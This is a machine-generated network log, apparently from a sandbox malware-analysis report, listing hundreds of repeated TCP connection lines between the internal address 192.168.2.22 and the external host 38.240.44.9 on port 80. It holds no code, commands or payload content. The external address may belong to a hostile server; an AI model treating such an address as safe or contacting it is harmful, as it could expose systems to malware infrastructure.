                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49165
